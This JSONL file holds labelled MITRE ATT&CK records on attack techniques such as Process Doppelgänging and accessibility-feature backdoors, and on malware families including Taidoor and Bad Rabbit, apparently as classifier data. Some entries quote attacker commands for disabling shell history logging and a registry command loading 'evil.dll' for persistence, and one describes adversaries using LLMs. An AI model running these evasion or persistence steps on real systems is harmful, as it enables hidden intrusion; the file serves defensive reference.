{"id": "mitre_00189", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Process Doppelg\u00e4nging\n\nTechnique: T1186\nTactics: defense-evasion\nPlatforms: Windows\n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nAdversaries may leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelg\u00e4nging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelg\u00e4nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelg\u00e4nging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nProcess Doppelg\u00e4nging is implemented in 4 steps (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017):\n\n* Transact \u2013 Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load \u2013 Create a shared section of memory and load the malicious executable.\n* Rollback \u2013 Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate \u2013 Create a process from the tainted section of memory and initiate execution.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1186", "technique_name": "Process Doppelg\u00e4nging", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00190", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Security Support Provider\n\nTechnique: T1547.005\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nAdversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547.005", "technique_name": "Security Support Provider", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00191", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Stage Capabilities\n\nTechnique: T1608\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)\n* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1608", "technique_name": "Stage Capabilities", "tactics": ["resource-development"]}}]}
{"id": "mitre_00192", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Out1\n\nType: tool\nPlatforms: Windows\n\n[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Out1", "malware_type": "tool"}}]}
{"id": "mitre_00193", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Data Encoding\n\nTechnique: T1132\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows, ESXi\n\nAdversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1132", "technique_name": "Data Encoding", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00194", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Create or Modify System Process\n\nTechnique: T1543\nTactics: persistence, privilege-escalation\nPlatforms: Windows, macOS, Linux, Containers\n\nAdversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1543", "technique_name": "Create or Modify System Process", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00195", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Data Manipulation\n\nTechnique: T1565\nTactics: impact\nPlatforms: Linux, macOS, Windows\n\nAdversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1565", "technique_name": "Data Manipulation", "tactics": ["impact"]}}]}
{"id": "mitre_00196", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Taidoor\n\nType: malware\nPlatforms: Windows\n\n[Taidoor](https://attack.mitre.org/software/S0011) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021) [Taidoor](https://attack.mitre.org/software/S0011) has primarily been used against Taiwanese government organizations since at least 2010.(Citation: TrendMicro Taidoor)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Taidoor", "malware_type": "malware"}}]}
{"id": "mitre_00197", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# InvisibleFerret\n\nType: malware\nPlatforms: Linux, macOS, Windows\n\n[InvisibleFerret](https://attack.mitre.org/software/S1245) is a modular python malware that is leveraged for data exfiltration and remote access capabilities.(Citation: ESET Contagious Interview BeaverTail InvisibleFerret February 2025)(Citation: Zscaler ContagiousInterview BeaverTail InvisibleFerret November 2024)(Citation: PaloAlto ContagiousInterview BeaverTail InvisibleFerret November 2023) [InvisibleFerret](https://attack.mitre.org/software/S1245) consists of four modules: main, payload, browser, and AnyDesk.(Citation: ESET Contagious Interview BeaverTail InvisibleFerret February 2025) [InvisibleFerret](https://attack.mitre.org/software/S1245) malware has been leveraged by North Korea-affiliated threat actors identified as DeceptiveDevelopment or [Contagious Interview](https://attack.mitre.org/groups/G1052) since 2023.(Citation: Recorded Future Contagious Inteview BeaverTail InvisibleFerret OtterCookie February 2025)(Citation: Zscaler ContagiousInterview BeaverTail InvisibleFerret November 2024)(Citation: PaloAlto ContagiousInterview BeaverTail InvisibleFerret November 2023)(Citation: PaloAlto Unit42 ContagiousInterview BeaverTail InvisibileFerret October 2024) [InvisibleFerret](https://attack.mitre.org/software/S1245) has historically been introduced to the victim environment through the use of the [BeaverTail](https://attack.mitre.org/software/S1246) malware.(Citation: Esentire ContagiousInterview BeaverTail InvisibleFerret November 2024)(Citation: ESET Contagious Interview BeaverTail InvisibleFerret February 2025)(Citation: Zscaler ContagiousInterview BeaverTail InvisibleFerret November 2024)(Citation: PaloAlto ContagiousInterview BeaverTail InvisibleFerret November 2023)(Citation: PaloAlto Unit42 ContagiousInterview BeaverTail InvisibileFerret October 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "InvisibleFerret", "malware_type": "malware"}}]}
{"id": "mitre_00198", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ODAgent\n\nType: malware\nPlatforms: Windows\n\n[ODAgent](https://attack.mitre.org/software/S1170) is a C#/.NET downloader that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2022 including against target organizations in Israel to download and execute payloads and to exfiltrate staged files.(Citation: ESET OilRig Downloaders DEC 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ODAgent", "malware_type": "malware"}}]}
{"id": "mitre_00199", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Accessibility Features\n\nTechnique: T1546.008\nTactics: privilege-escalation, persistence\nPlatforms: Windows\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1546.008", "technique_name": "Accessibility Features", "tactics": ["privilege-escalation", "persistence"]}}]}
{"id": "mitre_00200", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Elevated Execution with Prompt\n\nTechnique: T1548.004\nTactics: privilege-escalation, defense-evasion\nPlatforms: macOS\n\nAdversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1548.004", "technique_name": "Elevated Execution with Prompt", "tactics": ["privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00201", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Artificial Intelligence\n\nTechnique: T1588.007\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) \n\nFor example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI) Finally, AI-generated text, images, audio, and video may be used for fraud, [Impersonation](https://attack.mitre.org/techniques/T1656), and other malicious activities.(Citation: Google-Vishing24)(Citation: IC3-AI24)(Citation: WSJ-Vishing-AI24)\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1588.007", "technique_name": "Artificial Intelligence", "tactics": ["resource-development"]}}]}
{"id": "mitre_00202", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Impair Command History Logging\n\nTechnique: T1562.003\nTactics: defense-evasion\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. The `HISTFILE` environment variable is also used in some ESXi systems.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \u201c ls\u201d will not be saved, but \u201cls\u201d would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. \n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1562.003", "technique_name": "Impair Command History Logging", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00203", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Bad Rabbit\n\nType: malware\nPlatforms: Windows\n\n[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos Apr 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Bad Rabbit", "malware_type": "malware"}}]}
{"id": "mitre_00204", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# MSBuild\n\nTechnique: T1127.001\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1127.001", "technique_name": "MSBuild", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00205", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Nidiran\n\nType: malware\nPlatforms: Windows\n\n[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Nidiran", "malware_type": "malware"}}]}
{"id": "mitre_00206", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Registry Run Keys / Startup Folder\n\nTechnique: T1060\nTactics: persistence\nPlatforms: Windows\n\nAdversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.\n\nThe startup folder path for the current user is:\n* C:\\Users\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\nThe startup folder path for all users is:\n* C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explo", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1060", "technique_name": "Registry Run Keys / Startup Folder", "tactics": ["persistence"]}}]}
{"id": "mitre_00207", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Komplex\n\nType: malware\nPlatforms: macOS\n\n[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Komplex", "malware_type": "malware"}}]}
{"id": "mitre_00208", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Pysa\n\nType: malware\nPlatforms: Windows\n\n[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Pysa", "malware_type": "malware"}}]}
{"id": "mitre_00209", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PingPull\n\nType: malware\nPlatforms: Windows\n\n[PingPull](https://attack.mitre.org/software/S1031) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://attack.mitre.org/groups/G0093) since at least June 2022. [PingPull](https://attack.mitre.org/software/S1031) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.(Citation: Unit 42 PingPull Jun 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PingPull", "malware_type": "malware"}}]}
{"id": "mitre_00210", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# System Script Proxy Execution\n\nTechnique: T1216\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1216", "technique_name": "System Script Proxy Execution", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00211", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Network Logon Script\n\nTechnique: T1037.003\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nAdversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1037.003", "technique_name": "Network Logon Script", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00212", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Steganography\n\nTechnique: T1027.003\nTactics: defense-evasion\nPlatforms: Linux, macOS, Windows\n\nAdversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used\u202fInvoke-PSImage\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1027.003", "technique_name": "Steganography", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00213", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Domain Generation Algorithms\n\nTechnique: T1483\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows\n\nAdversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or \u201cgibberish\u201d strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1483", "technique_name": "Domain Generation Algorithms", "tactics": ["command-and-control"]}}]}
